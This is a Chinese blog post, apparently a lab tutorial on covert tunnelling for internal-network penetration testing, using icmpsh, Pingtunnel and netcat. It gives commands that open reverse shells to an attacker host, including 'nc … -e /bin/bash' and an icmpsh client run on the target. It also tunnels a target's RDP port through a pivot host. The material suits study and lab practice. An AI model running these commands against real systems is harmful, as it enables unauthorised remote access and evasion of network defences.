隐藏通信隧道技术(上)

已于 2022-04-07 19:08:27 修改
阅读量4.3k 收藏 4
点赞数 2
分类专栏: 内网渗透 文章标签: 安全 web安全
于 2022-04-07 01:15:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LJH1999ZN/article/details/124000185
版权

目录

一、防火墙的配置

二、kali虚拟机网卡配置

三、隐藏隧道技术的基础知识

1.什么是隧道技术:

2.检测内网连通性

3.利用icmp创建隧道

(1)使用的工具:  icmpsh

(2)工具:Pingtunnel

4.传输层隧道技术

4.1使用nc工具创建隧道

一、防火墙的配置

1..首先进去防火墙,此时我们需要配置符合自己环境的ip

2. 先配置lan ip

  1. 首先需要输入2,配置ip地址(仅主机)
  2. 输入子网掩码位数
  3. 是否需要dhcp服务
  4. 注意:此时需要配置仅主机模式的ip,如果没有仅主机的网卡就自己手动添加一个

3..然后继续配置wan的ip地址

  • 使用设置号的lan ip地址在浏览器输入
  • 然后输入密码与账号登录

最后点击保存即可

然后重启防火墙即可

二、kali虚拟机网卡配置

auto eth0
iface eth0 inet static
address 10.2.1.88
netmask 255.255.255.0
gateway 10.2.1.8

auto eth1
iface eth1 inet static
address 172.31.1.88
netmask 255.255.255.0
gateway 172.31.1.2

配置kali2019的网卡

auto eth0
iface eth0 inet static
address 10.2.1.170
netmask 255.255.255.0
gateway 10.2.1.1

 尝试是否可以内网互通

(1)查看是否可以ping通外网

 (2)查看是否可以ping通web服务器

 此时环境搭建成功

三、隐藏隧道技术的基础知识

1.什么是隧道技术:

隧道技术是一种通过使用互联网络基础设施在网络之间传递数据的方式。使用隧道传递的数据(或负载)可以是不同协议的数据帧或包。隧道协议将这些其他协议的数据帧或包重新封装在新的包头中发送。新的包头提供了路由信息,从而使封装的负载数据能够通过互联网络传递。

2.检测内网连通性

  • icmp :ping
  • tcp:  nc ip port
  • http: curl ip :port
  • dns :nslookup www.baidu.com vsp-ip​​​

3.利用icmp创建隧道

(1)使用的工具:  icmpsh

  1. git clone https://github.com/inquisb/icmpsh.git 下载icmpsh
  2. apt-get install python3-impacket 下载脚本
  3. sysctl –w net.ipv4.icmp_echo_ignore_all=1 关闭无数次ping
  4. echo 1 >/proc/sys/net/ipv4/icmp_echo_ignore_all 关闭无数次ping
  5. ./icmpsh_m.py 172.31.1.88 172.31.1.69  
  7. 然后再目标主机上运行icmpsh脚本
  8. Icmpsh.exe –t ip(需要你自己边界服务器的ip) –d 500 –b 30 –s 128
  10. 查看kali发现反弹shell成功

(2)工具:Pingtunnel

我们需要将内网的web服务器(kali2021)作为一跳板,使得外网的服务器(kali2019)获取到内网的3389端口

下载地址:Ping Tunnel – Freecode

  1. tar zxvf PingTunnel-0.72.tar.gz 解压
  2. cd PingTunnel     make && make install 安装
  3. ptunnel –x 123 在边界服务器上运行,123是密码
  4. 安装时会报错(让我们一一解决)
    1. 第一错误:configure: error: Neither flex nor lex was found.
    2. 解决:apt install flex bison
    3. 第二个错误:缺少pcap.h 
    4. 解决:wegt:http://www.tcpdump.org/release/libpcap-1.9.0.tar.gz
    5. taz zxvf libpcap-1.9.0.tar.gz
    6. cd libpcap-1.9.0.tar.gz
    7. ./configure 安装
    8. 第三个错误:yacc包错误
    9. 解决:sudo apt-get install -y byacc
    10. ./configure make
    11. sudo make install  安装 
  5. 首先开启ptunnel –x 123
  7. 在kali2019上边运行:ptunnel –p 10.2.1.88(跳板ip地址) –lp 1080 –da 172.31.1.69(目标ip地址)–dp 3389 –x 123

4.传输层隧道技术

4.1使用nc工具创建隧道

常用工具: Lcx  Netcat  powercat 

4.1.1 Netcat的使用

  1. banner抓取
  2. 命令:nc –nv 172.31.1.69 80
  3. 连接远程主机
  5. 端口扫描
  6. nc –v 172.31.1.69 80
  7. 端口监听(反弹shell)
    1. nc -lvp 666
    3. nc 10.2.1.88 6666 -e /bin/bash
  8. 文件传输
    1. nc –lp 333 >1.txt             将333端口获取到的信息导入1.txt中     
    2. nc –vn 监听主机ip 333 < test.txt    将test.txt中的信息传输到ip的333端口
    3. nc -lvp 1111 > /tmp/1..txt  将监听的文件存放到1.TXT文件下
    5. 在kali2019下输入nc -nv 10.2.1.88 1111 > /tmp/1.txt
    7. 在kali2021下查看文件
  9. 简易聊天
    1. 只要监听一个端口即可,然后让其他主机访问该端口就可以实现简易聊天
  10. 正向shell(他不知道将shell给谁,谁来连他就给谁shell)
    1. 将目标主机的shell给到其他服务器
  11. 反向shell(你只需要监听端口即可,那个主机访问这个端口就获得该主机的shell)

一句话木马
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
移动通信(第二版)中文版
03-29
本书从计算机科学的角度涵盖移动通信的各个方面,还指出了不同技术解决方案的共同属性,并阐明众所周知的从固定网络到支持终端移动性和无线接入网络的各种业务和应用的集成。本书主要内容有:移动和无线通信概述;...
编译C++工程提示:/usr/bin/ld: cannot find -lpcap
weixin_42718092的博客
04-26 1056
此问题是缺少lpcap这个动态库 libpcap是unix/linux平台下的网络数据包捕获函数包,大多数网络监控软件都以它为基础。Libpcap可以在绝大多数类unix平台下工作. 从官方网站:http://www.tcpdump.org/下载压缩包即可。当前的最新版本是1.9.0版本。 下载完成后进入解压后的目录 cd libpcap-1.9.0 依次执行以下三个命令: ./con...
Ubuntu常见错误问题解决
木小鱼的笔记
11-07 7713
Ubuntu系统中常见的错误信息以及解决办法
Linux编译libpcap
17岁boy的博客
04-23 591
在官网下载libpcap: wget -C http://www.tcpdump.org/release/libpcap-1.10.0.tar.gz 解压: tar -xvf libpcap-1.10.0.tar.gz && cd libpcap-1.10.0 执行gnu的一键部署makefile工具: ./configure 报错: configure: error: Neither flex nor lex was found. 因为缺少flex库,安装一下就可以了
tcpdump抓包命令及结果分析
weixin_33739523的博客
05-15 2607
tcpdump抓包分析详解tcpdump能帮助我们捕捉并保存网络包,保存下来的网络包可用于分析网络负载情况,包可通过tcpdump命令解析,也可以保存成后缀为pcap的文件,使用wireshark等软件进行查看。1.针对特定网口抓包(-i选项)当我们不加任何选项执行tcpdump时,tcpdump将抓取通过所有网口的包;使用-i选项,我们可以在某个指定的网口抓包:linux...
configure: error: Neither flex nor lex was found.
热门推荐
幽雨雨幽
05-02 1万+
在安装libpcap-1.8.1.tar时, 执行 [root@root libpcap-1.8.1]#./configure 出现错误: configure: error: Neither flex nor lex was found. 解决方法: [root@root libpcap-1.8.1]# yum install flex bison 错误消失, 然后重新
tcpdump安装实录
SnowXu01的博客
03-12 757
1. 安装 libpcap wget -c http://www.tcpdump.org/release/libpcap-1.9.1.tar.gz tar -zxvf libpcap-1.9.1.tar.gz cd libpcap-1.9.1 ./configure make && make install 1.1 安装小插曲 在执行./configure 的时候会遇到一个报错报...
ubuntu进行make时报错error: Neither flex nor lex was found.
hyper的博客
10-04 2678
在安装libpcap库的时候, 执行到sudo ./configure报标题错误, 解决方法: sudo apt-get install flex bison 然后从新执行 sudo ./configure即可解决。
centos7 configure: error: Neither flex nor lex was found.
°Destiny
05-01 2407
yum install byacc yum install flex
Could NOT find Pcap (missing: PCAP_LIBRARIES PCAP_INCLUDE_DIRS)
振华OPPO的博客世界
01-08 1544
在安装pcl库时,对pcl源代码进行cmake分析,出现以下错误:Could NOT find Pcap (missing: PCAP_LIBRARIES PCAP_INCLUDE_DIRS)
JINI 核心技术
02-08
13.4 与客户通信:事件和接收器 307 13.5 远程打印接口 308 13.6 打印服务代理 309 13.7 打印机管理API和用户界面 310 13.8 打印服务的内部实现 312 13.8.1 打印 318 13.8.2 持久数据的格式 319 13.8.3 实现打印服务...
JINI核心技术
10-21
本书全面讲解了Jini技术,包括发现、租借、远程事件、事务等主要概念,并提供真正的分布式连网技术以及可用于实际开发的Jini服务和应用程序技术,书中附有程序代码。本书适用于程序设计人员、网络技术人员。 ...
移动通信(第二版)中文版.part1(共两个分卷)
03-29
3.1.1隐藏的终端和暴露的终端 3.1.2近的终端和远的终端 3.2 SDMA 3.3 FDMA 3.4 TDMA 3.4.1固定TDM 3.4.2传统A1oha 3.4.3分隙A1oha 3.4.4载波侦听多址接入 3.4.5按需分配多址接入 3.4.6 PRMA分组预留多址接入 3.4.7...
大数据安全核心技术.pdf
12-24
⼤数据安全核⼼技术 ⼤数据安全核⼼技术 01 数据采集安全技术 数据采集安全技术 01.01 传输安全 传输安全 虚拟专⽤⽹络将隧道技术、协议封装技术、密码技术和配置管理技术结合在⼀起,采⽤安全通道技术在源端和⽬的...
Neither flex nor lex was found
huangbaokang的博客
05-13 1617
在编译libpcap的时候报了如下错 yum install flex bison 安装后,再次编译ok。 安装libpcap完成,才能安装ntop(一款网络监控工具) 前些天发现了一个巨牛的人工智能学习网站,通俗易懂,风趣幽默,忍不住分享一下给大家。点击跳转到教程 博客若对你有用,欢迎扫码打赏,你的打赏是我写作的动力。 欢迎加入康哥IT粉丝交流QQ群833249482 ...
Ubuntu16.04 install libpcap安装和测试
火星人
01-31 4216
1.官网下载安装包: http://www.tcpdump.org/#latest-release 2.开始配置 cd libpcap-1.9.0 ./configure 报错1:configure: error: Neither flex nor lex was found. 解决1:sudo apt-get install flex 报错2:configure: error: yacc is...
LINUX 抓包工具Tcpdump下载安装(非常详细),从零基础入门到精通,看完这一篇就够了
最新发布
Karka_的博客
08-24 2241
百度网盘地址:提取码:pyck由于tcpdump依赖libpcap因此两个安装包都需要下载。
ubuntu18.04编译项目报错:找不到pcac.h
hyper的博客
10-04 511
系统找不到 “pcap.h” 的解决办法: 安装 libpcap 库 1.打开网址:www.tcpdump.org/ 下载 libpcap-1.9.1.tar.gz (512.0KB) 软件包,将其放入自定义的安装目录,并解压文件。 2.进入到该文件夹内执行: sudo ./configure sudo make sudo make install PS:当执行到sudo ./configure报如下错误的话,点击下方链接: configure: error: Neither flex nor lex w
libpcap/tcpdump—1—编译安装
We do not claim to have achieved that goal in every aspect of the software, but we strive for it.
08-09 946
tcpdump的编译依赖libpcap编译出来的libpcap.a 所以在编译tcpdump之前需要先编译libpcap,我使用的是libpcap-1.9.0和tcpdump-4.9.2。 1、将两个文件夹放在同一个文件夹下,也就是目录下。这个在tcpdump的README.md中有说明,包括先编译libpcap也有说明。 2、进入libpcap文件夹执行./configure进行配置,开始阶...
ensp ipv6/ipv4通信隧道
06-28
ensp ipv6/ipv4通信隧道是一种技术,可以在IPv6和IPv4之间建立通信隧道,使得IPv6和IPv4网络之间可以互相通信。这种技术可以帮助企业和组织在IPv6和IPv4之间进行平滑过渡,同时保证网络的稳定性和安全性。通过ensp ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一句话木马

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值